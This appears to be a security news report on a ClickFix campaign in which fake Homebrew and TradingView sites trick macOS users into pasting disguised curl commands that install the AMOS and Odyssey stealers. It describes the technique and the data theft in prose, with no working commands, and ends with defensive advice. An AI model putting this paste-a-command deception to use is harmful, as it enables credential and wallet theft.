A new malicious campaign is targeting Apple developers by leveraging fake websites mimicking legitimate platforms like Homebrew, LogMeIn, and TradingView. Security researchers have identified attackers distributing information-stealing malware, specifically AMOS and Odyssey, by deceiving users into running malicious commands directly in the Terminal.
The attackers use a tactic called ClickFix, which exploits the ability for users to copy and paste commands directly into the Terminal. Researchers have identified over 85 domains used in the impersonation efforts, including examples like homebrewfaq.org and tradingviewen.com. Some of these fake sites utilize Google Ads to increase their visibility in search results.
The malicious websites present convincing download portals and installation instructions, including pre-formatted curl commands that users are prompted to paste into their Terminal. These commands often masquerade as legitimate Cloudflare validation IDs, but actually copy a base64-encoded installation script to the clipboard. The script downloads and executes an install.sh file, bypassing security measures like Gatekeeper. Once executed, the malware attempts to gain root privileges, collects system information, and disguises its activity by modifying system services and interacting with macOS XPC services. Finally, it harvests sensitive data, including browser cookies and credentials, cryptocurrency wallet extensions, Keychain data, and user files, which are then exfiltrated.
AMOS, first documented in April 2023, is now available as a Malware-as-a-Service (MaaS) with a reported monthly subscription cost of $1,000. Recent operators have added persistent backdoor capabilities to the malware, granting attackers ongoing remote access. Odyssey Stealer, a relatively new family derived from Poseidon Stealer, has been highlighted by CYFIRMA researchers this summer. It targets Chrome, Firefox, and Safari credentials, cryptocurrency wallet extensions, Keychain content, and personal files, exfiltrating data in ZIP format.
Security experts strongly advise users, particularly developers and those comfortable with the Terminal, to verify the content of any commands before executing them, especially those found online. The campaign highlights the importance of caution when dealing with links from advertising sources and the need for regular system and browser backups. Organizations and individuals are encouraged to avoid executing Terminal commands from unknown sources, use strong UAC/Gatekeeper settings, and consult security professionals for suspicious activity.
Related: Apple Security Updates, Malware Protection Tips, Homebrew Security
